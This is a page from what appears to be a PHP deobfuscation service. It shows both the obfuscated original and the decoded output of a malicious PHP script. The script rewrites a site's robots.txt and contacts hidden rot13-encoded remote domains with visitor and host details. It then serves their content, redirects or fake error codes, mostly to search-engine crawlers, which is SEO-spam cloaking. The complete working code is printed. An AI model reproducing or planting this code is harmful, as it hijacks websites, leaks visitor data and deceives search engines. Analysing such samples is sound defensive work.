Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto Mbo2i; CaEXv: $duri = drequest_uri(); goto H7dOI; j1XkN: function is_https() {..
Decoded Output download
<? goto Mbo2i;
CaEXv:
$duri = drequest_uri();
goto H7dOI; j1XkN:
function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto Ggwkr; XG6xm: $duri = urlencode($duri); goto SNLDf; SNLDf: $server = detect_server_software(); goto bHHTg; ElBuU: function create_robots($url) { $path = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt"; $content = "User-agent: *" . PHP_EOL; $content .= "Allow: /" . PHP_EOL . PHP_EOL; $content .= "Sitemap: " . $url . "/sitemap.xml" . PHP_EOL; $content .= "Sitemap: " . $url . "/sitemap-1.xml" . PHP_EOL; $content .= "Sitemap: " . $url . "/sitemap-2.xml" . PHP_EOL; $content .= "Sitemap: " . $url . "/sitemap-3.xml" . PHP_EOL; $content .= "Sitemap: " . $url . "/sitemap-4.xml" . PHP_EOL; $content .= "Sitemap: " . $url . "/sitemap-5.xml" . PHP_EOL; if (!file_exists($path)) { file_put_contents($path, $content); } else { $existingContent = file_get_contents($path); if ($existingContent !== $content) { file_put_contents($path, $content); } } } goto V4Ggc; meN62: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto GqYNo; ljMAi: if (!strstr($html_content, "nobotuseragent")) { if (strstr($html_content, "okhtml")) { @header("Content-type: text/html; charset=utf-8"); $html_content = str_replace("okhtml", '', $html_content); if ($istest) { echo $string; } echo $html_content; die; } else { if (strstr($html_content, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($html_content, "404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($html_content, "301page")) { @header("HTTP/1.1 301 Moved Permanently"); $html_content = str_replace("301page", '', $html_content); header("Location: " . $html_content); die; } else { if (strstr($html_content, "okxml")) { $html_content = str_replace("okxml", '', $html_content); @header("Content-Type: application/xml; charset=utf-8"); echo $html_content; die; } else { if (strstr($html_content, "okrobots")) { $html_content = str_replace("okrobots", '', $html_content); @header("Content-Type: text/plain"); echo $html_content; die; } } } } } } } goto AyFX_; dZuAK: if (is_https()) { $http = "https"; } else { $http = "http"; } goto L_UZy; kQcee: $string = "193-link175"; goto pEZoJ; DcW_z: if (isset($_SERVER["HTTP_REFERER"])) { $urlshang = $_SERVER["HTTP_REFERER"]; } goto dZuAK; AyFX_: function disbot() { $user_agent = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($user_agent, "googlebot") || stristr($user_agent, "bing") || stristr($user_agent, "yahoo") || stristr($user_agent, "google") || stristr($user_agent, "Googlebot")) { return 1; } else { return 2; } } goto MsF8c; GqYNo: if (empty($matches) || $matches[1] == "wp-crom.php" || $matches[1] == "detail.php") { $model_file = "index.php"; $model = "index"; } else { $model_file = $matches[1]; $position = strpos($duri, $model_file); if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file)); $model_file = ltrim($model_file, "/"); } $model = str_replace(".php", '', $model_file); } goto fNBfX; FCBC7: $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto xeDft; rlzca: $html_content = request($xmlname, $http_web, $param); goto ljMAi; Mbo2i: $xmlname = array("%31%39%33%2D%79%76%61%78%31%37%35%6E%2E%66%76%65%62%70%62%2E%67%62%63", "%31%39%33%2D%79%76%61%78%31%37%35%6F%2E%70%6E%61%62%76%72%2E%67%62%63", "%31%39%33%2D%79%76%61%78%31%37%35%70%2E%66%78%6C%75%62%62%78%66%2E%67%62%63", "%31%39%33%2D%79%76%61%78%31%37%35%71%2E%71%68%61%76%67%72%66%2E%6B%6C%6D", "%31%39%33%2D%79%76%61%78%31%37%35%72%2E%65%62%6B%72%61%72%2E%6B%6C%6D"); goto m_3vA; oWEOu: $param = "web=" . $host . "&zz=" . $zz . "&uri=" . $duri . "&urlshang=" . $urlshang . "&http=" . $http . "&lang=" . $lang . "&server=" . $server . "&model=" . $model; goto rlzca; VFkhB: $host = $_SERVER["HTTP_HOST"]; goto FCBC7; Ggwkr: function detect_server_software() { $path = $_SERVER["DOCUMENT_ROOT"] . "/.htaccess"; if (file_exists($path)) { return 1; } else { return 2; } } goto ElBuU; fNBfX: if (stristr($duri, "/?")) { $model = "?"; } goto kQcee; H7dOI: $duri = $duri == '' ? "/" : $duri; goto meN62; bHHTg: create_robots($http . "://" . $host); goto oWEOu; MsF8c: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $duri = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $duri; } goto j1XkN; xeDft: $urlshang = ''; goto DcW_z; m_3vA: $http_web = "https"; goto VFkhB; aKzzY: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/index.php", '', $duri); $duri = str_replace("!", '', $duri); } goto XG6xm; pEZoJ: $istest = false; goto cV_Mq; L_UZy: $zz = disbot(); goto CaEXv; cV_Mq: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto aKzzY; V4Ggc: function request($webs, $http_web, $param) { shuffle($webs); foreach ($webs as $domain) { $domain = str_rot13(urldecode($domain)); $url = $http_web . "://" . $domain . "/super6.php?" . $param; $response = @file_get_contents($url); if ($response !== false) { return $response; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } else { curl_close($ch); } } return "nobotuseragent"; } ?>Did this file decode correctly?
Original Code
goto Mbo2i;
CaEXv:
$duri = drequest_uri();
goto H7dOI; j1XkN:
function is_https() { if (isset($_SERVER["\110\124\124\120\x53"]) && strtolower($_SERVER["\x48\x54\124\x50\123"]) !== "\157\146\x66") { return true; } elseif (isset($_SERVER["\x48\x54\124\x50\x5f\x58\137\106\117\x52\127\x41\122\x44\x45\104\137\120\122\x4f\124\117"]) && $_SERVER["\x48\124\124\x50\137\130\x5f\106\117\122\127\101\x52\x44\105\x44\x5f\120\x52\117\124\x4f"] === "\150\164\164\160\x73") { return true; } elseif (isset($_SERVER["\110\x54\124\x50\x5f\x46\x52\117\116\124\x5f\x45\x4e\104\137\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\x48\x54\124\120\137\106\122\x4f\x4e\x54\137\105\x4e\104\x5f\110\124\x54\x50\x53"]) !== "\x6f\x66\146") { return true; } return false; } goto Ggwkr; XG6xm: $duri = urlencode($duri); goto SNLDf; SNLDf: $server = detect_server_software(); goto bHHTg; ElBuU: function create_robots($url) { $path = $_SERVER["\x44\117\103\x55\x4d\105\x4e\x54\x5f\x52\117\117\x54"] . "\57\162\x6f\x62\157\164\x73\56\x74\170\164"; $content = "\x55\x73\145\x72\x2d\141\x67\x65\156\164\x3a\x20\52" . PHP_EOL; $content .= "\x41\154\x6c\157\x77\72\40\57" . PHP_EOL . PHP_EOL; $content .= "\x53\x69\164\x65\x6d\141\x70\72\40" . $url . "\57\163\x69\x74\145\155\x61\160\x2e\x78\x6d\154" . PHP_EOL; $content .= "\123\x69\x74\x65\x6d\x61\160\x3a\40" . $url . "\x2f\x73\151\x74\145\x6d\141\x70\x2d\61\x2e\170\155\x6c" . PHP_EOL; $content .= "\x53\151\164\145\155\141\x70\72\40" . $url . "\x2f\x73\x69\164\x65\155\141\x70\55\x32\56\170\x6d\x6c" . PHP_EOL; $content .= "\123\151\164\145\155\x61\160\72\x20" . $url . "\57\x73\x69\164\145\155\141\x70\55\x33\x2e\x78\x6d\154" . PHP_EOL; $content .= "\123\x69\164\x65\x6d\141\x70\x3a\40" . $url . "\x2f\x73\151\x74\145\155\141\160\55\64\x2e\x78\x6d\154" . PHP_EOL; $content .= "\123\151\164\x65\155\141\x70\x3a\x20" . $url . "\x2f\163\151\164\x65\x6d\x61\160\55\x35\56\170\x6d\x6c" . PHP_EOL; if (!file_exists($path)) { file_put_contents($path, $content); } else { $existingContent = file_get_contents($path); if ($existingContent !== $content) { file_put_contents($path, $content); } } } goto V4Ggc; meN62: preg_match("\x2f\x5c\57\x28\x5b\x5e\x5c\x2f\x5d\x2b\x5c\56\x70\x68\x70\51\57", $duri, $matches); goto GqYNo; ljMAi: if (!strstr($html_content, "\156\x6f\x62\157\164\165\163\x65\162\x61\x67\x65\156\164")) { if (strstr($html_content, "\x6f\153\x68\164\155\154")) { @header("\103\x6f\x6e\x74\145\x6e\164\x2d\164\171\x70\145\72\x20\164\x65\170\164\57\x68\x74\155\x6c\x3b\x20\x63\150\141\162\x73\x65\164\x3d\165\x74\146\x2d\x38"); $html_content = str_replace("\157\x6b\150\x74\x6d\x6c", '', $html_content); if ($istest) { echo $string; } echo $html_content; die; } else { if (strstr($html_content, "\147\145\x74\x63\157\x6e\x74\x65\156\x74\x35\x30\x30\x70\x61\147\145")) { @header("\x48\124\x54\120\x2f\61\x2e\61\40\65\60\60\x20\111\156\164\145\x72\156\141\154\40\x53\x65\x72\166\x65\162\40\x45\162\x72\157\x72"); die; } else { if (strstr($html_content, "\64\60\x34\160\141\147\x65")) { @header("\x48\124\x54\120\57\61\x2e\x31\40\64\60\64\x20\x4e\157\164\40\106\157\x75\156\x64"); die; } else { if (strstr($html_content, "\x33\x30\x31\x70\x61\147\145")) { @header("\110\x54\x54\x50\x2f\61\56\61\x20\63\x30\61\40\115\157\x76\145\x64\x20\x50\145\x72\x6d\141\x6e\145\156\164\154\171"); $html_content = str_replace("\x33\60\61\160\141\x67\x65", '', $html_content); header("\114\157\143\141\x74\151\x6f\x6e\72\x20" . $html_content); die; } else { if (strstr($html_content, "\x6f\153\x78\155\154")) { $html_content = str_replace("\x6f\153\170\x6d\154", '', $html_content); @header("\x43\157\x6e\x74\145\156\x74\55\x54\171\x70\x65\72\40\141\x70\x70\x6c\x69\143\x61\164\x69\x6f\x6e\57\x78\155\154\x3b\x20\x63\150\141\162\x73\145\x74\75\165\x74\146\55\70"); echo $html_content; die; } else { if (strstr($html_content, "\157\x6b\162\157\142\x6f\164\x73")) { $html_content = str_replace("\157\x6b\162\157\142\x6f\164\x73", '', $html_content); @header("\x43\157\156\164\145\156\x74\55\124\x79\x70\145\72\40\164\145\170\164\x2f\x70\x6c\x61\x69\x6e"); echo $html_content; die; } } } } } } } goto AyFX_; dZuAK: if (is_https()) { $http = "\x68\164\164\160\163"; } else { $http = "\150\x74\x74\x70"; } goto L_UZy; kQcee: $string = "\x31\x39\63\55\x6c\x69\x6e\x6b\61\x37\x35"; goto pEZoJ; DcW_z: if (isset($_SERVER["\x48\x54\124\120\137\122\105\x46\x45\x52\x45\x52"])) { $urlshang = $_SERVER["\110\x54\124\120\x5f\122\105\106\105\x52\105\x52"]; } goto dZuAK; AyFX_: function disbot() { $user_agent = strtolower($_SERVER["\x48\124\x54\120\137\x55\x53\105\122\137\x41\x47\105\116\x54"]); if (stristr($user_agent, "\x67\x6f\x6f\147\154\x65\142\x6f\164") || stristr($user_agent, "\x62\151\156\x67") || stristr($user_agent, "\x79\141\x68\157\x6f") || stristr($user_agent, "\147\157\x6f\x67\x6c\x65") || stristr($user_agent, "\x47\x6f\157\147\x6c\145\x62\x6f\x74")) { return 1; } else { return 2; } } goto MsF8c; GqYNo: if (empty($matches) || $matches[1] == "\167\x70\55\143\162\157\155\x2e\160\x68\x70" || $matches[1] == "\144\145\x74\141\151\x6c\56\160\x68\x70") { $model_file = "\x69\156\x64\x65\170\x2e\x70\x68\x70"; $model = "\151\x6e\144\145\x78"; } else { $model_file = $matches[1]; $position = strpos($duri, $model_file); if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file)); $model_file = ltrim($model_file, "\x2f"); } $model = str_replace("\x2e\160\150\160", '', $model_file); } goto fNBfX; FCBC7: $lang = @$_SERVER["\110\x54\124\x50\x5f\x41\103\x43\x45\120\124\137\114\x41\x4e\107\125\x41\107\105"]; goto xeDft; rlzca: $html_content = request($xmlname, $http_web, $param); goto ljMAi; Mbo2i: $xmlname = array("\x25\63\x31\45\63\71\45\63\63\45\62\104\x25\x37\x39\45\67\66\45\x36\x31\45\67\70\x25\63\61\45\x33\67\45\x33\x35\45\x36\x45\45\x32\x45\45\x36\x36\45\67\x36\45\66\x35\45\66\62\45\x37\60\45\66\62\45\62\x45\x25\x36\x37\x25\66\x32\45\x36\63", "\45\63\61\45\x33\71\45\x33\x33\45\x32\104\x25\x37\x39\45\x37\66\45\66\x31\45\x37\70\45\63\x31\x25\63\67\45\x33\65\x25\66\106\x25\x32\x45\x25\67\x30\45\x36\105\45\66\x31\45\x36\x32\x25\x37\66\45\67\62\45\62\105\x25\x36\x37\45\66\x32\x25\x36\x33", "\45\63\61\x25\63\x39\45\63\x33\45\x32\x44\x25\67\71\45\67\x36\x25\66\61\45\x37\x38\45\63\x31\x25\63\x37\45\x33\65\45\x37\60\45\x32\105\45\x36\66\45\67\x38\45\66\x43\x25\67\x35\x25\66\x32\45\x36\62\45\67\x38\x25\66\66\x25\62\x45\x25\66\x37\45\x36\x32\x25\66\x33", "\x25\x33\x31\45\63\x39\45\63\63\x25\x32\x44\x25\x37\71\x25\67\x36\x25\66\61\x25\67\x38\45\63\61\45\63\x37\45\63\x35\45\x37\61\x25\x32\105\x25\67\x31\45\x36\x38\x25\x36\61\x25\x37\66\45\x36\67\45\x37\x32\45\66\x36\45\x32\x45\x25\x36\102\45\66\103\45\x36\104", "\45\x33\x31\45\x33\x39\45\63\63\x25\62\x44\x25\x37\71\45\67\x36\45\66\61\45\67\70\x25\63\x31\x25\x33\x37\x25\x33\65\x25\67\x32\x25\62\x45\x25\66\x35\45\66\x32\45\x36\x42\45\67\62\45\x36\61\45\67\62\x25\62\x45\45\66\x42\45\66\x43\45\x36\104"); goto m_3vA; oWEOu: $param = "\167\145\142\x3d" . $host . "\x26\172\x7a\x3d" . $zz . "\x26\165\162\x69\75" . $duri . "\x26\x75\162\154\x73\150\x61\x6e\147\x3d" . $urlshang . "\x26\150\x74\164\x70\x3d" . $http . "\46\154\x61\x6e\x67\75" . $lang . "\x26\x73\145\162\166\145\162\x3d" . $server . "\x26\x6d\157\x64\145\154\75" . $model; goto rlzca; VFkhB: $host = $_SERVER["\110\x54\x54\120\137\x48\x4f\123\124"]; goto FCBC7; Ggwkr: function detect_server_software() { $path = $_SERVER["\x44\117\x43\x55\x4d\105\x4e\124\x5f\x52\117\x4f\124"] . "\x2f\x2e\150\x74\141\143\143\x65\163\163"; if (file_exists($path)) { return 1; } else { return 2; } } goto ElBuU; fNBfX: if (stristr($duri, "\57\77")) { $model = "\77"; } goto kQcee; H7dOI: $duri = $duri == '' ? "\x2f" : $duri; goto meN62; bHHTg: create_robots($http . "\72\x2f\x2f" . $host); goto oWEOu; MsF8c: function drequest_uri() { if (isset($_SERVER["\x52\x45\121\125\105\x53\x54\137\x55\x52\111"])) { $duri = $_SERVER["\122\105\x51\x55\x45\x53\124\x5f\x55\122\x49"]; } else { if (isset($_SERVER["\x61\162\x67\166"])) { $duri = $_SERVER["\x50\x48\x50\137\x53\105\x4c\106"] . "\77" . $_SERVER["\x61\x72\147\x76"][0]; } else { $duri = $_SERVER["\x50\x48\x50\x5f\123\105\x4c\106"] . "\77" . $_SERVER["\121\x55\105\122\131\137\123\x54\122\x49\116\x47"]; } } return $duri; } goto j1XkN; xeDft: $urlshang = ''; goto DcW_z; m_3vA: $http_web = "\x68\x74\x74\160\163"; goto VFkhB; aKzzY: if ($duri != "\57") { $duri = str_replace("\x2f" . $model_file, '', $duri); $duri = str_replace("\x2f\x69\x6e\144\x65\170\x2e\x70\150\x70", '', $duri); $duri = str_replace("\x21", '', $duri); } goto XG6xm; pEZoJ: $istest = false; goto cV_Mq; L_UZy: $zz = disbot(); goto CaEXv; cV_Mq: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto aKzzY; V4Ggc: function request($webs, $http_web, $param) { shuffle($webs); foreach ($webs as $domain) { $domain = str_rot13(urldecode($domain)); $url = $http_web . "\x3a\x2f\57" . $domain . "\x2f\163\x75\x70\x65\x72\x36\56\x70\150\x70\77" . $param; $response = @file_get_contents($url); if ($response !== false) { return $response; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } else { curl_close($ch); } } return "\x6e\x6f\142\157\164\165\x73\145\x72\141\147\145\x6e\x74"; }Function Calls
| None |
Stats
| MD5 | 614fa0597ed355b067ce3da2548e3135 |
| Eval Count | 0 |
| Decode Time | 58 ms |